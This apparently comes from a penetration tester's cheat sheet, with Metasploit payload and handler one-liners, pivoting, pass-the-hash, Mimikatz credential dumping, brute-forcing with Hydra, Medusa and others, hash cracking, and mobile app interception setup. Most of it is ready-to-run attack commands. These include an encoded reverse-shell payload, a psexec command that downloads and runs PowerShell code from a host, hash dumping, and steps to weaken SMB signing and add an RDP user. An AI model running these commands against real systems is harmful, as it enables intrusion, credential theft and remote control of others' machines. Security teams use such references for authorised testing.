To see compatible payloads for a selected exploit

show payloads

To set the payload for a selected exploit

set payload

To set setting for a selected exploit

set

To run the exploit

exploit

One liner to create/generate a payload for windows

msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_tcp LHOST=<listening_host> LPORT=<listening_port> --bad-chars “\x00” --encoder x86/shikata_ga_nai --iterations 10 --format exe --out /path/

One liner start meterpreter

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <listening_host>;set LPORT <listening_port>;run;"

----------------- [+] Metasploit Pivot

Compromise 1st machine

meterpreter> run arp_scanner -r 10.10.10.0/24

route add 10.10.10.10 255.255.255.248 use auxiliary/scanner/portscan/tcp use bind shell

or run autoroute:

meterpreter > ipconfig

meterpreter > run autoroute -s 10.1.13.0/24

meterpreter > getsystem

meterpreter > run hashdump

use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > use exploit/windows/smb/psexec

or port forwarding:

meterpreter > run autoroute -s 10.1.13.0/24

use auxiliary/scanner/portscan/tcp

meterpreter > portfwd add -l -p -r <remote/internal host>

or socks proxy: route add 10.10.10.10 255.255.255.248 use auxiliary/server/socks4a Add proxy to /etc/proxychains.conf proxychains nmap -sT -T4 -Pn 10.10.10.50 setg socks4:127.0.0.1:1080

----------------- [+] Pass the hash

If NTML only: 00000000000000000000000000000000:8846f7eaee8fb117ad06bdd830b7586c

STATUS_ACCESS_DENIED (Command=117 WordCount=0): This can be remedied by navigating to the registry key, "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters" on the target systems and setting the value of "RequireSecuritySignature" to "0"

Run hashdump on the first compromised machine: run post/windows/gather/hashdump

Run Psexec module and specify the hash: use exploit/windows/smb/psexec

----------------- [+] Enable RDP: meterpreter > run getgui -u hacker -p s3cr3t Clean up command: meterpreter > run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up__20110112.2448.rc

----------------- [+] AutoRunScript Automatically run scripts before exploiation: set AutoRunScript "migrate explorer.exe"

[+] Set up SOCKS proxy in MSF

[+] Run a post module against all sessions resource /usr/share/metasploit-framework/scripts/resource/run_all_post.rc

[+] Find local subnets 'Whilst in meterpreter shell' meterpreter > run get_local_subnets

Add the correct Local host and Local port parameters

echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.0.7 -Lport 443 -Force" >> /var/www/payload

Set up psexec module on metasploit

auxiliary/admin/smb/psexec_command set command powershell -Exec Bypass -NoL -NoProfile -Command IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.9/payload')

Start reverse Handler to catch the reverse connection

Module options (exploit/multi/handler): Payload options (windows/meterpreter/reverse_https):

Name Current Setting Required Description

---

EXITFUNC process yes Exit technique: seh, thread, process, none LHOST 192.168.0.9 yes The local listener hostname LPORT 443 yes The local listener port

Show evasion module options

show evasion

[+] Metasploit Shellcode msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d'

-------------------------------------------------------------------------- File Transfer Services

[+] Start TFTPD Server atftpd --daemon --port 69 /tmp

[+] Connect to TFTP Server tftp 192.168.0.10 put / get files

-------------------------------------------------------------------------- LDAP Querying

Tools: ldapsearch LDAPExplorertool2

Anonymous Bind: ldapsearch -h ldaphostname -p 389 -x -b "dc=domain,dc=com"

Authenticated: ldapsearch -h 192.168.0.60 -p 389 -x -D "CN=Administrator, CN=User, DC=, DC=com" -b "DC=, DC=com" -W

Useful Links: http://www.lanmaster53.com/2013/05/public-facing-ldap-enumeration/ http://blogs.splunk.com/2009/07/30/ldapsearch-is-your-friend/

-------------------------------------------------------------------------- Password Attacks Convert multiple webpages into a word list:

    for x in 'index' 'about' 'post' 'contact' ; do curl
    http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >>
    webapp.txt ; done

Or convert html to word list dict html2dic index.html.out | sort -u > index-html.dict

[+] Bruteforcing http password prompts medusa -h <ip/host> -u -P -M http -n -m DIR:/ -T 30

[+] Medusa

To display all currently installed modules

medusa -d

Display specific options for a module

medusa -M [module_name] -q

Test all passwords in password file against the admin user on the host

192.168.1.20 via the SMB | SSH | MySQL | HTTP service

medusa -h 192.168.1.20 -u admin -P passwords.txt -M [smbnt | ssh | mssql | http]

To brute force 10 hosts and 5 users concurrently (using Medusa's parallel features)

Each of the 5 threads targeting a host will check a specific user

medusa -H hosts.txt -U users.txt -P passwords.txt -T 10 -t 5 -L -F -M smbnt

Medusa allows username, password, and host data to be placed within the same file (the "combo" file).

Possible combinations in the combo file:

host:username:password

host:username:

host::

:username:password

:username:

::password

host::password

🆔lm:ntlm::: (PwDump files)

To test each username/password entry in the file combo.txt

medusa -M smbnt -C combo.txt

[+] Hydra #hydra does not have a native default wordlist, using the Rockyou list is suggested #example brute force crack on ftp server hydra -t 1 -l admin -P [path to password.lst] -vV [IPaddress] ftp --> -t # = preform # tasks --> -l NAME = try to log in with NAME --> -P [filepath] = Try password --> -vV = verbose mode, showing the login+pass for each attempt

#check for joe accounts by adding modifier -e s

#Hydra brute force against SNMP hydra -P password-file.txt -v $ip snmp

#Hydra FTP known user and password list hydra -t 1 -l admin -P /root/Desktop/password.lst -vV $ip ftp

#Hydra SSH using list of users and passwords hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh

#Hydra SSH using a known password and a username list hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh

#Hydra SSH Against Known username on port 22 hydra $ip -s 22 ssh -l -P big_wordlist.txt

#Hydra POP3 Brute Force hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V

#Hydra SMTP Brute Force hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V

#Hydra attack http get 401 login with a dictionary hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin

#Hydra attack Windows Remote Desktop with rockyou hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip

#Hydra brute force a Wordpress admin login hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

#to write found login+pass combinations to fiel, add modifier -0 [fileanme]

[+] Mimikatz #Extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets https://github.com/gentilkiwi/mimikatz From metasploit meterpreter (must have System level access):

meterpreter> load mimikatz meterpreter> help mimikatz meterpreter> msv meterpreter> kerberos meterpreter> mimikatz_command -f samdump::hashes meterpreter> mimikatz_command -f sekurlsa::searchPasswords

[+] ncrack #ncrack (from the makers of nmap) can brute force RDP ncrack -vv --user offsec -P password-file.txt rdp://$ip

[+] John The Ripper #To show the types of passwords that John can crack with crack speed (in cracks/second) john --test

#unshadow passwd-file.txt shadow-file.txt unshadow passwd-file.txt shadow-file.txt > unshadowed.txt john $ip.pwdump john --wordlist=/usr/share/wordlists/rockyou.txt hashes john --rules --wordlist=/usr/share/wordlists/rockyou.txt john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

#JTR forced descrypt cracking with wordlist john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt

#JTR forced descrypt brute force cracking john --format=descrypt hash --show

#To use your own word list (the Rockyou list is suggested) john --wordlist=[filename] [passwordfile]

#To show your results after running john (shows ~/.john/john.pot) john --show

#To restore an interrupted john session john --restore

[+] Hashcat #Hashcat uses precomputed dictionaries, rainbow tables, and even a brute-force approach to find an effective and efficient way crack passwords.

#usage: hashcat [options] hash|hasfile|hccapxfile [dictonary|mask|directory]

Important options are -m --hashtype and -a --attack-mode

Example: hashcat -a 0 -m 500 -o output.txt hashes.txt rockyou.txt

#Attack modes 0 - Straight 1 - Combination 3 - Brute-force 6 - Hybrid wordlist+Mask 7 - Hybrid mask + Wordlist

Hash types

Hash cat can crack numerous types of hashes. When the hashes doesn't match with hash type(-m) option "line length execption" arises Quick reference to check hash type with example: https://hashcat.net/wiki/doku.php?id=example_hashes

[+] Cain and Abel #Cain and Abel is a hacking application exclusive to Windows, it can crack numerous hash types, including NTLM, NTLMv2, MD5, wireless, Oracle, MySQL, SQL Server, SHA1, SHA2, Cisco, VoIP, and many others.

#To perform dictionary attack for cracking passwords by using cain and abel first import the NTLM hashes. Next in cracker tab, all imported username and hashes will be displayed. Select desired user, right click and select dictonary attack NTLM hashes window will popup Right click on top blank area Select Add to list and browse dictonary or wordlist file Click start

[+] Ophcrack #Ophcrack is a free rainbow table-based password cracking tool for Windows 8 (both local and Microsoft accounts), Windows 7, Windows Vista, and Windows XP.

#The Ophcrack LiveCD option allows for completely automatic password recovery.

#It cracks LM and NTLM (Windows) hashes.

#Pros Software is freely available for download online Passwords are recovered automatically using the LiveCD method No software installation is necessary to recover passwords No knowledge of any existing passwords is necessary

#Cons LiveCD ISO image must be burned to a disc or USB device before being used Passwords greater than 14 characters cannot be cracked Won't crack even the simplest Windows 10 password

[+] RainbowCrack #The RainbowCrack software cracks hashes by rainbow table lookup.

#To crack single hash rcrack [rainbow_table_path] -h hash_to_be_cracked Path - Location of rainbow tables Example: rcrack c:\rt -h fcea920f7412b5da7be0cf42b8c93759

#To crack multiple hashes in a file rcrack [rainbow_table_path] -l hash_file Example: rcrack c:\rt -l hash_list_file

#To lookup rainbow tables in multiple directories rcrack [rainbow_table_path] [rainbow_table_path2] -l hash_file Example: rcrack c:\rt1 c:\rt2 -l hash_list_file

#To load and crack LM hashes from pwdump file rcrack [rainbow_table_path] -lm pwdump_file

#To load and crack NTLM hashes from pwdump file rcrack [rainbow_table_path] -ntlm pwdump_file

[+] acccheck #Windows Password dictionary attack tool for SMB

#Usage: acccheck [options] options -t [single host IP address] -T [file containing target ip address(es)] -p [single password] -P [file containing passwords] -u [single user] -U [file containing usernames]

#Examples Attempt the 'Administrator' account with a [BLANK] password. acccheck -t 10.10.10.1 Attempt all passwords in 'password.txt' against the 'Administrator' account. acccheck -t 10.10.10.1 -P password.txt Attempt all password in 'password.txt' against all users in 'users.txt'. acccehck -t 10.10.10.1 -U users.txt -P password.txt Attempt a single password against a single user. acccheck -t 10.10.10.1 -u administrator -p password

[+]Brutespray #BruteSpray takes nmap GNMAP/XML output and automatically brute-forces services with default credentials using Medusa.

#usage: brutespray [-h] -f FILE [-o OUTPUT] [-s SERVICE] [-t THREADS] [-T HOSTS] [-U USERLIST] [-P PASSLIST] [-u USERNAME] [-p PASSWORD] [-c] [-i] #Example brutespray --file nas.gnmap -U /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/password.lst --threads 3 --hosts 1 Attack all services in nas.gnmap with a specific user list (unix_users.txt) and password list (password.lst).

[+]Crowbar #Crowbar is a brute force tool which supports OpenVPN, Remote Desktop Protocol, SSH Private Keys and VNC Keys.

#usage: crowbar -b [openvpn | rdp | sshkey | vnckey] [arguments] Example:crowbar -b rdp -s 192.168.86.61/32 -u victim -C /root/words.txt -n 1 Brute force the RDP service on a single host with a specified username and wordlist, using 1 thread.

[+]Aircrack-ng #Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured.

#usage aircrack-ng [options] <.cap / .ivs file(s)> To have aircrack-ng conduct a WEP key attack on a capture file, pass it the filename, either in .ivs or .cap/.pcap format.

#WPA Wordlist Mode aircrack-ng -w password.lst wpa.cap Specify the wordlist to use (-w password.lst) and the path to the capture file (wpa.cap) containing at least one 4-way handshake.

#Basic WEP Cracking aircrack-ng all-ivs.ivs To have aircrack-ng conduct a WEP key attack on a capture file, pass it the filename, either in .ivs or .cap/.pcap format.

MOBILE TESTING

http://pen-testing.sans.org/blog/pen-testing/2013/12/02/mobile-device-tips-tricks-and-resources

------------------------------------------ Mobile Application Test Notes (iPhone)

Prepping Device and Application:

[+] Jailbreak iPhone/iPad - Green Poison / Absinthe 2.04 [+] Enable SSH on iPhone/iPad [+] Install iFunbox to install the application (http://www.i-funbox.com) [+] Connect device to lab wireless network [+] Add web proxy settings - IP address of attacking machine port 8080 [+] Ensure connection and SSH is working

Prepping Burp Suite:

[+] Open Burp Suite and navigate to Proxy->Options, [-] Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’.

[+] Download and install burp certificate (.crt) onto ipad.

Mobile Application Penetration Testing:

[+] Browse the following Directory for insecure storage [-] /private/var/mobile/applications/

Notes:

[+] Application file type - x.ipa

[+] Easy way:

• Place attacking machine and apple device on wireless network with app installed.

• Email burps .cer to apple device and install

• Start burp and disable firewall on listening machine.

• Change proxy settings on apple device to point to listening burp machine/port.

------------------------------------------ Mobile Application Test Notes (Android)

Prepping the application (After Android Nougat, Apps need to repackaged since they don't trust user certificates by default)

• https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html

[+] apktool d <path of the .apk file> [+] Update AndroidManifest.xml [-] Add android:networkSecurityConfig="@xml/network_security_config" to application tag in xml [+] Add network_security_config.xml to res/xml folder [-] "Trusting user-added CAs for all secure connections" section in https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html [+] Repackage the application [-] apktool b unpacked_apk_folder -o [+] Signing the application [-] Create a keystore using keytool [-] jarsigner -keystore -storepass -keypass android

Creating an emulator and installing the application

[+] Create a virtual device: [-] android avd

[+] Start the emulator: [-] emulator –avd testavd

[+] Install the application: [-] adb install <path of the .apk file>

[+] Open Burp Suite and navigate to Proxy->Options, [-] Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’.

[+] Start the emulator and proxy: [-] emulator –avd testavd –http-proxy http://localhost:8080

[+] Download and install burp certificate (.crt) onto the emulator using the push shell command.

Notes:

[+] Application file type - x.apk

Install Certs: http://www.realmb.com/droidCert/ SQLite Database Browser: http://sourceforge.net/projects/sqlitebrowser/?source=pdlp

http://www.mcafee.com/uk/resources/white-papers/foundstone/wp-pen-testing-android-apps.pdf